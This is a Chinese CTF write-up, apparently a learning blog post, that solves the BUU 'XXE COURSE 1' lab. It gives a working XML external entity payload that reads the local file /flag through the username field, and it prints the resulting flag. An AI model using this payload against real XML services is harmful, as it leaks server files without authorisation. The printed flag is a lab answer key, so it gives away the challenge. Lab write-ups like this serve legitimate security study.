XXE(xml外部实体注入漏洞)学习心得

靶机:BUU XXE COURSE 1 1
1.进入靶场
在这里插入图片描述
2.如何判断是XXE漏洞
在输入框输入参数,打开bp,出现以下,可能是存在XXE在这里插入图片描述
或者F12,查看源码,由此可以确定是XXE漏洞在这里插入图片描述
3.破解,找到flag
构造playload,

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE flag[

<!ENTITY a SYSTEM "file:///flag">
]>
<root> 
<username>&a;</username> 
<password>a</password>
</root>

4.得到flag
在这里插入图片描述
flag:flag{f16ed034-6cdf-420c-81a4-9179dc0ac293}

# xml # web安全 # 网络安全
Logo
魔乐社区

魔乐社区(Modelers.cn) 是一个中立、公益的人工智能社区,提供人工智能工具、模型、数据的托管、展示与应用协同服务,为人工智能开发及爱好者搭建开放的学习交流平台。社区通过理事会方式运作,由全产业链共同建设、共同运营、共同享有,推动国产AI生态繁荣发展。

更多推荐

cover

【计算机视觉】Pixel逐像素分类&Mask掩码分类理解摘要

avatar 魔乐社区

计算机视觉(opencv)实战三十二——CascadeClassifier 人脸微笑检测(摄像头)

本文从原理到实现,详细介绍了基于 OpenCV Haar 分类器的人脸与微笑检测:讲解了 Haar 特征和级联检测原理。对代码逐行拆解并解释参数含义。画出完整流程图,帮助理解执行过程。给出了常见问题和优化建议,甚至扩展到深度学习方法。这种方法简单、轻量、实时性好,非常适合入门和小型应用项目。但如果需要更高准确率和更强鲁棒性,建议使用深度学习检测器替代 Haar 分类器。

avatar 魔乐社区
cover

小杰机器学习(seven)——贝叶斯分类

avatar 魔乐社区